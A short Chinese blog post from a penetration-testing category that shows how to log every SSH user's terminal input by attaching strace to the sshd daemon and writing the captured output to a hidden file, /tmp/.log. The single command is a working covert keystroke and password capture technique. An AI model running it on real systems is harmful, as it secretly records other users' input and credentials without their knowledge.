记录所有ssh登陆用户的输入记录 | 半块西瓜皮的博客

记录所有ssh登陆用户的输入记录

2021-04-01|渗透

字数总计: 106|阅读时长: 1 分钟

strace

利用strace记录进程的syscall,需要root权限

-e trace=write 仅记录write的syscall
signal=none 不记录信号相关
-f 追踪子进程
-P /dev/ptmx 记录虚拟终端的write操作
-p 9999 9999为sshd守护进程的PID
-o /tmp/.log 记录到文件/tmp/.log

1	strace -e trace=write -e signal=none -f -P /dev/ptmx -p 9999 -o /tmp/.log

执行效果

input

log

不支持`-P`的情况

下载此文件，上传执行

文章作者: 半块西瓜皮

文章链接: https://guage.cool/pty-logger/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自半块西瓜皮的博客！

本地搜索

由 hexo-generator-search 提供支持